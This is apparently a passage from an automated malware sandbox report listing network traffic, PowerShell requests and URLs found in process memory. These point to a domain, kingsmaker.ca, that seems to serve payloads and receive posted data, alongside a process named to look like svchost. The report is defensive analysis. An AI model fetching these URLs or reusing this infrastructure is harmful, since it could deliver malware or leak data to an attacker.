        Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: kingsmaker.ca
        Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
        Source: unknownHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b439940f2a4e27446bc2 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 302
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://.css
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://.jpg
        Source: powershell.exe, 00000018.00000002.3543855106.000001ADF61BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: svchost.exe, 0000000E.00000002.3598133552.0000015D94E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: svchost.exe, 0000000E.00000003.2282329209.0000015D94CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://html4/loose.dtd
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD3582000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDC702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kingsmaker.ca
        Source: svczHost.exe, 00000014.00000002.3596341581.0000019BF3806000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3595742715.0000019BF088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kingsmaker.ca/api/check
        Source: svczHost.exe, 00000014.00000002.3596341581.0000019BF3806000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kingsmaker.ca:80/x
        Source: powershell.exe, 00000000.00000002.2461403361.000001BDE2506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2461403361.000001BDE2363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3495330648.00000212936C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000005.00000002.2303309267.000001ABDB902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADFD96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: svczHost.exe, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD22F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADF871000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmp, powershell.exe, 00000018.00000002.2845746986.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.2303309267.000001ABDB902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADFD96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000000.00000002.2467580408.000001BDEA400000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2371234415.000001ABF37E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
        Source: powershell.exe, 0000001C.00000002.3557582962.000002129BC21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cod
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AEF910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000000.2780145016.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe.11.drString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: svczHost.exeString found in binary or memory: https://aka.ms/nativeaot-c
        Source: svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
        Source: svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD22F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADF871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2845746986.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 0000001C.00000002.2871665748.0000021284789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3554704406.000002129BA30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 0000000B.00000002.2814252312.0000016AE1830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svchost.exe, 0000000E.00000003.2282329209.0000015D94D53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
        Source: svchost.exe, 0000000E.00000003.2282329209.0000015D94CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
        Source: powershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AEF910000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2780145016.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe.11.drString found in binary or memory: https://github.com/dotnet/runtime
        Source: powershell.exe, 00000005.00000002.2303309267.000001ABDC1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2845746986.000001AD815B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD3582000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD3A44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD2517000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD391C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDC6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADFBED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18X
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD28D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b4
        Source: powershell.exe, 0000000B.00000002.2814252312.0000016ADFC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb3
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD298B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66a2bd10c53ccb7e
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad5X
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD298B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD28D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522ed
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/2db1
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/2db1653a19d9e7820417a355a5bebd72b81f7e460fa70a5a1edfbf43f5b246051372de1d
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/2db1X
        Source: powershell.exe, 0000000B.00000002.2814252312.0000016ADFC2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ac
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/31b8
        Source: powershell.exe, 00000005.00000002.2303309267.000001ABDB902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8
        Source: powershell.exe, 0000000B.00000002.2814252312.0000016ADFA99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADF871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37
        Source: powershell.exe, 00000000.00000002.2397775512.000001BDD2517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59e
        Source: powershell.exe, 00000000.00000002.2461403361.000001BDE2363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3495330648.00000212936C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
